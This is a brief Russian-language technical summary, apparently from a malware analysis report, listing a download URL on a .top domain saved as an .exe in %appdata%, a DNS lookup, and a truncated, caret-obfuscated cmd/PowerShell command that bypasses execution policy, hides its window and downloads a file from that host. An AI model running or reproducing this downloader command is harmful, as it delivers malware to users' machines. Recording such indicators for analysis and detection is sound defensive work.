Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WerSh^Ell.^EXe ^-^E^XEcutI^o^np^OL^ic^y^ ^B^YpAS^s^ -^nO^p^rO^f^il^e -WINDO^w^ST^yle hidd^E^n ^(NE^W-o^BJEct S^YS^TEM^.^N^E^t.we^BcLiENt)^.DO^W^nlOA^DfI^LE^('http://zussi...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "pO^WerSh^Ell.^EXe ^-^E^XEcutI^o^np^OL^ic^y^ ^B^YpAS^s^ -^nO^p^rO^f^il^e -WINDO^w^ST^yle hidd^E^n ^(NE^W-o^BJEct S^YS^TEM^.^N^E^t.we^BcLiENt)^.DO^W^nlOA^DfI^LE^('http://zussi...' (со скрытым окном)